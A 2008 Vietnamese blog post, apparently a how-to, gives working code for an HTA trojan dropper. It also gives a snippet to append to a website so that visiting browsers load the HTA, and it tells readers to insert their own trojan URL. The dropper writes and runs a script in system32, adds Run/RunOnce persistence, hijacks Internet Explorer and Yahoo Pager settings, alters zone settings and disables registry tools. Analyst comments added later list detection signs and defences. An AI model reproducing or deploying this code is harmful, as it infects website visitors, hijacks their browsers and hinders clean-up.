Jun 10, 2008

vbscript set homepage hta


save file với đuôi .hta

<!-- Analyst note: HTML Application (HTA) dropper. When opened, the script below
     writes a second script to disk, runs it, and the window closes itself.
     Observable artefacts for defenders: a System.js file under the Windows
     folder's system32, per-user Run/RunOnce values pointing at it, changed
     Internet Explorer start page and TypedURLs, and DisableRegistryTools = 1.
     Hosts that do not need HTAs can block mshta.exe with application control
     (AppLocker / WDAC) and associate .hta/.js with a non-executing handler. -->
<html>
<head>
<script language=”javascript”>
// Stage 1: runs inside the HTA, which instantiates file-system and shell
// ActiveX objects directly.
try {
var fso = new ActiveXObject(“Scripting.FileSystemObject”);
var Shell = new ActiveXObject(“WScript.Shell”);
// GetSpecialFolder(0) is the FileSystemObject constant for the Windows folder,
// so the drop path is <Windows folder>\system32\System.js.
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
// Second argument true = overwrite an existing file of the same name.
var a2 = fso.CreateTextFile(filepath2, true);
// Stage 2 is generated line by line: every WriteLine below emits one statement
// of the dropped script. The first lines recompute the same drop path.
a2.WriteLine(‘var url = “http://troiancuaban.exe”;’);
a2.WriteLine(‘var burl = “http://troiancuaban.exe”;’);
a2.WriteLine(‘var fso = new ActiveXObject(“Scripting.FileSystemObject”);’);
a2.WriteLine(‘var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(‘var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(‘var Shell = new ActiveXObject(“WScript.Shell”);’);
// Persistence: RunOnce and Run values in the current user's hive are pointed
// at the dropped script. A Run value whose data is a script file under
// system32 is a strong detection signal.
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows”,filepath);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32”,filepath);’);
// Browser hijack: Internet Explorer start page, then the TypedURLs entries
// url1..url11 (the typed-address history), are overwritten with the same URL.
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1”,url);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2″,”http://http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11″,”http://troiancuaban.exe”);’);
// "content url" values under Yahoo\Pager\View (Yahoo! Messenger panes, judging
// by the key names) are pointed at a second site.
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Calendar\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Games\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Launchcast\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Weather\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
// Fifteen identical writes of one ZoneMap\Domains value with DWORD 4 (4 is the
// Restricted Sites zone id in Internet Explorer's zone numbering). Unexpected
// per-user ZoneMap changes are worth alerting on.
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
// Tamper indicator: the per-user policy that disables the registry editing
// tools is set, which hinders manual clean-up. Removal has to clear this
// policy value as well as the Run/RunOnce entries and the dropped file.
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools”,1,”REG_DWORD”);’);
a2.Close();
// Executes the file just written; presumably through the default .js handler
// (Windows Script Host). A script host started as a child of mshta.exe is a
// useful process-lineage signal.
Shell.Run(filepath2);
}
// Every error is discarded, so a failure leaves nothing visible to the user.
catch (e){}
</script>
<!-- Window starts minimised and is kept out of the taskbar; the body's onload
     handler then closes it, so the user sees almost nothing. -->
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>
<!— <frameset></frameset> –>
[/html]

rồi save lại với tên là : hackervn.hta

nhớ là thay đường dẫn của con trojan đi nha..(http://troiancuaban.exe) là con trojan của tôi

sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:

<!-- Analyst note: this is the fragment the post says to append to a web page.
     A span is data-bound (dataformatas html) to the XML data island oRun, whose
     CDATA section holds an object element with its data attribute set to
     hackervn.hta. Data binding of this kind is a legacy Internet Explorer
     feature. For site owners, an unexpected block like this near the closing
     body/html tags is an indicator of page tampering. Web and mail gateways
     should block, or at least log, .hta content delivered to browsers. -->
<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id=”oFile” data=”hackervn.hta?id=1″></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

Article Categories:
Virut/Trojan